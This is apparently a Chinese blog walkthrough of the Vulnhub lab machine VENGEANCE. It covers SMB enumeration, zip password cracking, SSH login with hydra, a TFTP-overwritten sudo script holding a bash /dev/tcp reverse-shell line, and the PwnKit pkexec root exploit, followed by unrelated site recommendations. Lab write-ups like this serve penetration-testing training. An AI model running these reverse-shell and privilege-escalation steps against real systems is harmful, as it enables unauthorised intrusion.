[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+PwnKit:Pkexec权限提升

最新推荐文章于 2024-07-22 15:44:53 发布
最新推荐文章于 2024-07-22 15:44:53 发布
阅读量274 收藏 1
点赞数 2
分类专栏: Vulnhub 文章标签: bash
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140588651
版权

信息收集

IP AddressOpening Ports
192.168.101.153TCP:80,110,113,139,143,443,445,993,995,22222

$ nmap -p- 192.168.101.153 --min-rate 1000 -sC -sV

Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE  SERVICE      VERSION
7/tcp     closed echo
22/tcp    closed ssh
80/tcp    open   http         nginx 1.18.0 (Ubuntu)
|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_auth-owners: www-data
88/tcp    closed kerberos-sec
110/tcp   open   pop3
| fingerprint-strings:
|   FourOhFourRequest, LDAPSearchReq:
|     +OK Dovecot (Ubuntu) ready.
|     -ERR Unknown command.
|     -ERR Unknown command.
|   LDAPBindReq:
|     +OK Dovecot (Ubuntu) ready.
|   LPDString:
|     +OK Dovecot (Ubuntu) ready.
|_    -ERR Unknown command.
|_pop3-capabilities: CAPA UIDL TOP PIPELINING STLS SASL AUTH-RESP-CODE RESP-CODES
|_auth-owners: dovenull
113/tcp   open   ident?
|_auth-owners: root
139/tcp   open   netbios-ssn  Samba smbd 4.6.2
|_auth-owners: root
143/tcp   open   imap         Dovecot imapd
|_auth-owners: dovenull
|_imap-capabilities: more LOGINDISABLEDA0001 have IDLE OK ENABLE capabilities LITERAL+ Pre-login listed STARTTLS IMAP4rev1 ID SASL-IR post-login LOGIN-REFERRALS
161/tcp   closed snmp
389/tcp   closed ldap
443/tcp   open   ssl/http     nginx 1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=VENGEANCE/organizationName=Good Tech Inc/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2021-02-14T02:40:28
|_Not valid after:  2022-02-14T02:40:28
| tls-alpn:
|   h2
|_  http/1.1
| tls-nextprotoneg:
|   h2
|_  http/1.1
|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_auth-owners: www-data
445/tcp   open   netbios-ssn  Samba smbd 4.6.2
|_auth-owners: root
993/tcp   open   imaps?
995/tcp   open   pop3s?
1337/tcp  closed waste
2049/tcp  closed nfs
6000/tcp  closed X11
8080/tcp  closed http-proxy
22222/tcp open   ssh          OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
|   3072 32:eb:05:fa:d3:75:45:5e:c7:72:fb:03:aa:05:b7:d7 (RSA)
|   256 40:16:f8:d1:f1:06:e5:aa:13:44:28:ed:e0:55:ef:34 (ECDSA)
|_  256 52:78:15:c2:3b:a1:90:20:3a:b1:d6:75:93:72:d8:f8 (ED25519)
54321/tcp closed unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port110-TCP:V=7.92%I=7%D=7/21%Time=669C9A3E%P=x86_64-pc-linux-gnu%r(Fou
SF:rOhFourRequest,4B,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\.\r\n-ERR\x20
SF:Unknown\x20command\.\r\n-ERR\x20Unknown\x20command\.\r\n")%r(LPDString,
SF:34,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\.\r\n-ERR\x20Unknown\x20comm
SF:and\.\r\n")%r(LDAPSearchReq,4B,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\
SF:.\r\n-ERR\x20Unknown\x20command\.\r\n-ERR\x20Unknown\x20command\.\r\n")
SF:%r(LDAPBindReq,1D,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\.\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -1s
| smb2-time:
|   date: 2024-07-21T05:19:11
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required

$ enum4linux 192.168.101.153

image.png

username:sara
username:qinyi

image-1.png

本地权限

$ smbclient -L //192.168.101.153/

image-2.png

$ smbclient //192.168.101.153/sarapublic$

smb: \> lcd /tmp/mp
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

image-3.png

image-5.png

image-4.png

$ awk '{for(i=1;i<=NF;i++) print $i}' profile.txt | sort | uniq > password.txt

$ zip2john gio.zip >hash

$ john hash --wordlist=./password.txt

image-6.png

password:nanotechnological

image-7.png

image-8.png

Giovanni

image-9.png

giovanni_130R_Suzuka

image-12.png

$ hydra -l user -p 'giovanni_130R_Suzuka' ssh://192.168.101.153:22222

image-10.png

image-11.png

Local.txt 截屏

image-13.png

Local.txt 内容

Local access to the box obtained.

权限提升

TFTP & SUDO权限提升

$ netstat -lnput

image-17.png

查看tftp配置文件目录

$ cat /etc/default/tftpd-hpa

image-18.png

$ sudo -l

image-19.png

$ tftp 192.168.101.153 69

tftp> get eaurouge

image-20.png

通过TFTP上传eaurouge覆盖原来文件

/bin/bash -c 'bash -i >& /dev/tcp/192.168.101.128/10032 0>&1'

image-21.png

$ tftp 192.168.101.153 69

tftp> put eaurouge

$ sudo /home/sara/private/eaurouge

image-22.png

PwnKit:pkexec 权限提升

[Kali]$ wget https://github.com/ly4k/PwnKit/blob/main/PwnKit.c

[Kali]$ gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

[Target]$ ./PwnKit

image-14.png

Proof.txt 截屏

image-15.png

Proof.txt Content

Root access obtained! Congratulations on breaking through the 6th box in the digitalworld.local series. Hope you enjoyed this one.

Мартин.
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tensorflow 2.x(keras)源码详解之第四章:Dataset&TFRecord
weixin_43178406的博客
04-19 1万+
1. data input pipelines(Dataset) 1.1 构造Dataset及简介 1.1.1 tf.data.Dataset.from_tensor_slices 1.1.2 tf.data.Dataset.from_tensor 1.1.3 tf.data.Dataset.from_generator 1.1.4 tf.data.Dataset.range 1.1.5 tf.data.TFRecordDataset 1.1.6 tf.data.TextLineDataset 1.1.7
靶机渗透练习58-digitalworld.local:VENGEANCE
hirak0的博客
04-19 1663
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-vengeance,704/ Description 2021 brings us the VENGEANCE of digitalworld.local! A box born out of COVID-19. This machine was built whilst the author was mulling over life in infosec whilst doing hi
Cakewalk Z3TA+ 2 v2.2.3.51 win-mac 波塑形合成器加预设合集
精品音乐制作资源分享
08-10 1639
Cakewalk Z3TA+ 2 v2.2.3.51 win-mac | 100M Z3TA + 2设计为适合您的任何电子产品。从流行音乐到说唱音乐,从充满活力的音乐到大气,您都可以触手可及的声音。 波形整形综合 选择,调整和微调波形 自由和自适应弯音模拟风格的性能网格 14连续可变的双级滤波器类型 包络,可控制任何参数 6用于单个或通用控制的强大LFO 直截了当的Mod矩阵和琶音工具 全局控制破碎的砖墙限制器,电平,调音和复音 内置效果 5种失真类型,以及路由选...
考研英语真题23+14共37套
qq_45601540的博客
08-24 587
,此时我们会想到是平行结构“A, B, or C”形式,但是,这里比较特殊,这里是“length retreats…”,和“or taking…并且“-”后是“be it lengthy retreats…”,很明显,这里不是正常句子的语序,出现了倒装,它的原型是这样的“it be lengthy retreats…(这个其实是源自于从句的省略和倒装,原本的句子应该是“whether it may be lengthy retreats…be in a position to do:有能力做,有条件做。
gucci canada-962
u016532259的专栏
11-09 1037
Amanda Holden to change expecting Holly Willoughby about this Early morning Amanda stated: within the celestial satellite to find the opportunity to existing among my personal favorite exhibits upo
我如何配置自己的第一个深度学习+数据科学工作站?
读芯术的博客
09-10 1008
全文共4129字,预计学习时长11分钟 图源:unsplash 配置自己的工作站是我一直以来梦寐以求的事情。我倒是知道该如何配置,但却迟迟没有尝试,无非是因为没钱或没时间,主要是没钱。 但终于到了事在必行的时刻了。我受够了在亚马逊云服务(AWS)上为小型个人项目设置服务器,进行繁琐的安装操作,又或是不得不使用对运行时间和网络连接有诸多限制的Google Collab notebooks。因此,在英伟达显卡(NVIDIA)客服的帮助下,我花了点时间构建了一个深度学习装置。 整...
samurai_ii__vengeance(武士二:复仇)无法在android上运行的原因
Kris Fei's blog
04-22 3034
运行程序的时候会提示程序停止,抓到如下log: 01-12 06:29:17.649 I/ActivityManager(  562): Start proc com.android.vending for service com.android.vending/com.google.android.finsky.services.LicensingService: pid=4547 uid=1
Python 获取Google+特定用户最新动态
热门推荐
weixin_33722405的博客
02-18 4万+
CODE: #!/usr/bin/python # -*- coding: utf-8 -*- ''' Created on 2014-8-28 @author: guaguastd @name: login.py # Request over http def google_login_http(resource_type, action, field): # ...
Java 之父 James Gosling 最新访谈:JIT 很好,但不适合所有语言
禅与计算机程序设计艺术
08-27 1万+
计算机编程确实是一门艺术。James Gosling,“Java 之父”, 完成了 Java 的原始设计,并实现了 Java 最初版本的编译器和虚拟机。90年代初,James Goslin...
Grange-Digital-Vengeance-Exploiting-The-Most-Notorious-C&C-Toolk
10-25
《Grange-Digital-Vengeance-Exploiting-The-Most-Notorious-C&C-Toolkits》是一份深入探讨网络攻防中指挥与控制(C&C)工具包的文档,旨在揭示这些工具包的工作原理、利用方式以及防御策略。C&C工具包在黑客攻击中...
Romanovs-Vengeance:Romanov's Vengeance是基于Red Alert 2的OpenRA mod
02-17
"Romanovs-Vengeance",这是一个令人兴奋的项目,它是基于经典的即时战略游戏《红色警戒2》(Red Alert 2)而制作的一个开源重制模组(OpenRA mod)。这个模组不仅继承了原作的策略精髓,还注入了全新的元素和挑战,...
VengeanceAurelith-list:Vengeance Aurelith的Rimworld流存储列表
02-21
Vengeance Aurelith在Rimworld中的流存储列表解析》 在Rimworld这款深受玩家喜爱的策略生存游戏中,玩家经常会寻找各种MOD来丰富游戏体验。"Vengeance Aurelith-list"是一个针对Rimworld游戏的特定MOD,它由...
Dark Blade: Throne of Vengeance-开源
04-27
2. **3D地牢爬行**:游戏采用3D视角,玩家将在迷宫般的地下城中探险,击败怪物,寻找宝藏,解决谜题,不断提升角色的能力。这种地牢爬行的玩法强调探索和生存,对玩家的战略思考和反应速度有一定要求。 3. **复古...
Kingdom Rush Vengeance Wallpapers Tab Theme-crx插件
03-17
安装此扩展程序,以在每个新选项卡上获得游戏Kingdom Rush Vengeance的高清图像! 我们始终会更新图像,因此请继续签入...通过我们的扩展,您可以获得:1:高分辨率的新标签页体验2:简单,干净的视图-无图块! 3:...
bash XXX.sh文件和直接运行XXX.sh的区别
m0_49448331的博客
07-22 280
【代码】bash XXX.sh文件和直接运行XXX.sh的区别。
RKNN执行bash ./build-linux_RK3566_RK3568.sh 报错
qq_53545309的博客
07-22 572
usr/lib/gcc-cross/aarch64-linux-gnu/11/../../../../aarch64-linux-gnu/bin/ld:/home/zyk/RKnn3568模型部署/rknpu2-master/rknpu2-make[2]: *** [CMakeFiles/rknn_yolov5_video_demo.dir/build.make:181:rknn_yolov5_video_demo] 错误 1。make: *** [Makefile:136:all] 错误。
这演示的叫啥数学模型来着,似曾很熟
最新发布
07-25
这演示的叫啥数学模型来着,似曾很熟
b131学生成绩分析和弱项辅助系统-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
07-25
学生成绩分析和弱项辅助系统在对开发工具的选择上也很慎重,为了便于开发实现,选择的开发工具为Eclipse,选择的数据库工具为Mysql。以此搭建开发环境实现学生成绩分析和弱项辅助系统的功能。其中管理员管理用户,新闻公告。 学生成绩分析和弱项辅助系统是一款运用软件开发技术设计实现的应用系统,在信息处理上可以达到快速的目的,不管是针对数据添加,数据维护和统计,以及数据查询等处理要求,学生成绩分析和弱项辅助系统都可以轻松应对。 学生信息管理页面,此页面提供给管理员的功能有:学生信息的查询管理,可以删除学生信息、修改学生信息、新增学生信息,还进行了对用户名称的模糊查询的条件。教师信息管理页面,此页面提供给管理员的功能有:查看已发布的教师信息数据,修改教师信息,教师信息作废,即可删除,还进行了对教师信息名称的模糊查询 教师信息信息的类型查询等等一些条件。试卷信息管理页面,此页面提供给管理员的功能有:根据试卷信息进行条件查询,还可以对试卷信息进行新增、修改、查询操作等等。公告信息管理页面,此页面提供给管理员的功能有:根据公告信息进行新增、修改、查询操作等等。
帮我DIY一台5000左右重度游戏英特尔+rxt3060的电脑主机并提供每个器件的购买链接
03-31
抱歉,我作为AI语言模型无法提供购买链接,但我可以为您提供所需的器件列表: 1. CPU: 英特尔 Core i5-11600K 2. 主板: ASUS TUF Gaming Z590-PLUS WIFI 3. 内存: Corsair Vengeance RGB Pro 16GB DDR4 3600MHz 4. 显卡: NVIDIA GeForce RTX 3060 12GB 5. 存储: WD Blue SN550 NVMe SSD 1TB 6. 机箱: NZXT H510 Elite 7. 电源: EVGA 600W 80+ Bronze 请注意,这只是一个建议的配置,您可以根据自己的需求和预算进行调整和更改。同时,购买时请确保器件的兼容性和质量,以确保电脑主机的稳定性和性能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值